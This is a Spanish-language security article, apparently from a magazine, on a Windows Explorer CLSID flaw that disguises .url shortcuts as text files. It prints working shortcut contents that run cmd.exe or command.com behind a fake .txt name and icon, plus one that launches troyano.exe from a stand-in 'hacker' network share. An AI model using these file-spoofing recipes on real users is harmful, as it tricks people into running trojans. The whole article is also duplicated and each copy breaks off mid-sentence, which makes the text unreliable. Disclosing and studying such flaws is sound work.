Microsoft Windows Explorer CLSID
Ayudamos a resolver un nuevo fallo o vulnerabilidad en el explorador de Windows que deja sin defensas a todos los usuarios de este sistema en todas sus versiones (Windows 9x/2000).
Los fallos de seguridad más populares suelen ser los que afectan de una forma u otra a los programas relacionados con Internet como el Internet Explorer o el Internet Information Server de Microsoft, pero esta vez es el explorador de Windows (Microsoft Windows Explorer) el afectado.
El explorador de Windows es el encargado de gestionar el escritorio del sistema así como los menús correspondientes, por lo que un fallo de seguridad en este software deja a miles (o millones) de usuarios indefensos.
En este caso las especificaciones de clases de Microsoft para los archivos del sistema conocidas como CLSID (ver cuadro CLSID) permiten a un atacante ocultar un archivo en apariencia inocente en un posible troyano o virus.
Descripción técnica
El fallo consiste simplemente en añadir una CLSID al nombre del fichero que hace que el código de la CLSID se encuentre oculto gracias a las bondades de Windows, es decir, si un archivo tiene este formato: nombre.ext.{ CLSID }, entonces el explorador de Windows sólo mostrará nombre.ext en el escritorio, pero el archivo será efectivamente del tipo asignado a esa CLSID en el registro.
Buscando en el registro del sistema se pueden encontrar varias CLSID interesantes. La CLSID de un archivo del tipo .lnk (enlace a otro archivo) es: {00021401-0000-0000-C000-000000000046}; pero más atractiva es la de los archivos con extensión .url (archivos con direcciones URL o web) que es la siguiente: {FBF23B40-E3F0-101B-8488-00AA003E56F8}.
Si alguien crea el archivo: CreditCard .txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} con el siguiente contenido en Windows 98:
[InternetShortcut]
URL=file://c:/command.com
o en Windows 2000:
[InternetShortcut]
URL=file://c:/winnt/system32/cmd.exe
El archivo, que en apariencia es Credit Card.txt (es decir un archivo de texto), es realmente un archivo que permite ejecutar cualquier comando del sistema como, en este caso, el command.com o el cmd.exe en Windows 98 y 2000 respectivamente.
El icono del archivo en el escritorio muestra un icono de un archivo ejecutable con un indicador de acceso directo por lo que más de un usuario se daría cuenta que algo raro pasa. El problema llega cuando se añade el siguiente código a un archivo llamado CreditCard2.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} en Windows 98:
[InternetShortcut]
URL=file://c:/command.com
IconIndex=-152
IconFile=shell32.dll
o en Windows 2000:
[InternetShortcut]
URL=file://c:/winnt/system32/cmd.exe
IconIndex=-152
IconFile=shell32.dll
En este caso –como puede comprobar en la imagen– el icono del archivo CreditCard.txt ahora se ha convertido en el icono de un archivo de texto, lo que consigue que un usuario normal piense que es este el tipo de datos los que contiene, cuando en realidad está ejecutando el interprete de comandos del sistema. Es posible cambiar la apariencia del icono alterando la variable IconIndex dentro del archivo en cuestión.
Si en lugar de ejecutar el cmd.exe o com mand.com se ejecutará un troyano el equipo del usuario tendría un grave problema de seguridad, ya que ni siquiera se pide confirmación para ejecutar el comando, simplemente se ejecuta como un archivo ejecutable más.
Pero las cosas no acaban aquí. Si el hacker se encuentra en la misma red (Intranet) que la victima, existe la posibilidad de ejecutar el programa malvado directamente desde la red gracias al cliente para redes de Windows. Imagínese que el archivo passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} se coloca en la red de la empresa en un directorio público (la mayoría de las empresas que usan redes Microsoft disponen de uno) con el siguiente contenido:
[InternetShortcut]
URL=file://hacker/compartir/ruta/al/troyano.exe
IconIndex=-152
IconFile=shell32.dll
Es preciso que el ordenador hacker de la red tenga activado el recurso Compartir, con lo que es posible ejecutar el comando troyano.exe por cualquier usuario de la red que efectúe un doble clic en el archivo passwd .txt (que se encuentra en el directorio público y, por supuesto, no contiene texto).
Incluso si el archivo troyano.exe creara un archivo llamado passwd.txt (sin el CLSID) en el escritorio de la víctima con algún contenido falso, entonces no dejaría ninguna pista al confiado usuario, lo que hace que este fallo sea aún más grave de lo que podría parecer en un primer momento.
Conclusión
Llegados a este punto la mejor conclusión (aunque quizá demasiado alarmista) sería: no haga doble clic en ningún archivo del escritorio de Windows o mejor aún use otro explorador para gestionar sus archivos como el Windows Commander que puede descargar de la dirección www.ghisler.com.
Para ser realistas la primera opción es inviable, ya que si trabaja con el ordenador en la oficina es más que posible que use el sistema operativo Windows junto con otros programas de Microsoft como Internet Explorer y OutLook, que como se está demostrando en esta sección tienen graves vulnerabilidades y en su entorno de trabajo no esté permitido introducir nuevos programas (precisamente por razones de seguridad, por lo que deberá consultar con su administrador).
Si es un usuario particular puede usar alguna opción alternativa como el Windows Commander para explorar su escritorio y el navegador Opera (www.opera.com) para deambular por Internet, pero aún así nunca estará seguro ya que en menor o mayor medida todo este software funciona
Los fallos de seguridad más populares suelen ser los que afectan de una forma u otra a los programas relacionados con Internet como el Internet Explorer o el Internet Information Server de Microsoft, pero esta vez es el explorador de Windows (Microsoft Windows Explorer) el afectado.
El explorador de Windows es el encargado de gestionar el escritorio del sistema así como los menús correspondientes, por lo que un fallo de seguridad en este software deja a miles (o millones) de usuarios indefensos.
En este caso las especificaciones de clases de Microsoft para los archivos del sistema conocidas como CLSID (ver cuadro CLSID) permiten a un atacante ocultar un archivo en apariencia inocente en un posible troyano o virus.
Descripción técnica
El fallo consiste simplemente en añadir una CLSID al nombre del fichero que hace que el código de la CLSID se encuentre oculto gracias a las bondades de Windows, es decir, si un archivo tiene este formato: nombre.ext.{ CLSID }, entonces el explorador de Windows sólo mostrará nombre.ext en el escritorio, pero el archivo será efectivamente del tipo asignado a esa CLSID en el registro.
Buscando en el registro del sistema se pueden encontrar varias CLSID interesantes. La CLSID de un archivo del tipo .lnk (enlace a otro archivo) es: {00021401-0000-0000-C000-000000000046}; pero más atractiva es la de los archivos con extensión .url (archivos con direcciones URL o web) que es la siguiente: {FBF23B40-E3F0-101B-8488-00AA003E56F8}.
Si alguien crea el archivo: CreditCard .txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} con el siguiente contenido en Windows 98:
[InternetShortcut]
URL=file://c:/command.com
o en Windows 2000:
[InternetShortcut]
URL=file://c:/winnt/system32/cmd.exe
El archivo, que en apariencia es Credit Card.txt (es decir un archivo de texto), es realmente un archivo que permite ejecutar cualquier comando del sistema como, en este caso, el command.com o el cmd.exe en Windows 98 y 2000 respectivamente.
El icono del archivo en el escritorio muestra un icono de un archivo ejecutable con un indicador de acceso directo por lo que más de un usuario se daría cuenta que algo raro pasa. El problema llega cuando se añade el siguiente código a un archivo llamado CreditCard2.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} en Windows 98:
[InternetShortcut]
URL=file://c:/command.com
IconIndex=-152
IconFile=shell32.dll
o en Windows 2000:
[InternetShortcut]
URL=file://c:/winnt/system32/cmd.exe
IconIndex=-152
IconFile=shell32.dll
En este caso –como puede comprobar en la imagen– el icono del archivo CreditCard.txt ahora se ha convertido en el icono de un archivo de texto, lo que consigue que un usuario normal piense que es este el tipo de datos los que contiene, cuando en realidad está ejecutando el interprete de comandos del sistema. Es posible cambiar la apariencia del icono alterando la variable IconIndex dentro del archivo en cuestión.
Si en lugar de ejecutar el cmd.exe o com mand.com se ejecutará un troyano el equipo del usuario tendría un grave problema de seguridad, ya que ni siquiera se pide confirmación para ejecutar el comando, simplemente se ejecuta como un archivo ejecutable más.
Pero las cosas no acaban aquí. Si el hacker se encuentra en la misma red (Intranet) que la victima, existe la posibilidad de ejecutar el programa malvado directamente desde la red gracias al cliente para redes de Windows. Imagínese que el archivo passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} se coloca en la red de la empresa en un directorio público (la mayoría de las empresas que usan redes Microsoft disponen de uno) con el siguiente contenido:
[InternetShortcut]
URL=file://hacker/compartir/ruta/al/troyano.exe
IconIndex=-152
IconFile=shell32.dll
Es preciso que el ordenador hacker de la red tenga activado el recurso Compartir, con lo que es posible ejecutar el comando troyano.exe por cualquier usuario de la red que efectúe un doble clic en el archivo passwd .txt (que se encuentra en el directorio público y, por supuesto, no contiene texto).
Incluso si el archivo troyano.exe creara un archivo llamado passwd.txt (sin el CLSID) en el escritorio de la víctima con algún contenido falso, entonces no dejaría ninguna pista al confiado usuario, lo que hace que este fallo sea aún más grave de lo que podría parecer en un primer momento.
Conclusión
Llegados a este punto la mejor conclusión (aunque quizá demasiado alarmista) sería: no haga doble clic en ningún archivo del escritorio de Windows o mejor aún use otro explorador para gestionar sus archivos como el Windows Commander que puede descargar de la dirección www.ghisler.com.
Para ser realistas la primera opción es inviable, ya que si trabaja con el ordenador en la oficina es más que posible que use el sistema operativo Windows junto con otros programas de Microsoft como Internet Explorer y OutLook, que como se está demostrando en esta sección tienen graves vulnerabilidades y en su entorno de trabajo no esté permitido introducir nuevos programas (precisamente por razones de seguridad, por lo que deberá consultar con su administrador).
Si es un usuario particular puede usar alguna opción alternativa como el Windows Commander para explorar su escritorio y el navegador Opera (www.opera.com) para deambular por Internet, pero aún así nunca estará seguro ya que en menor o mayor medida todo este software funciona
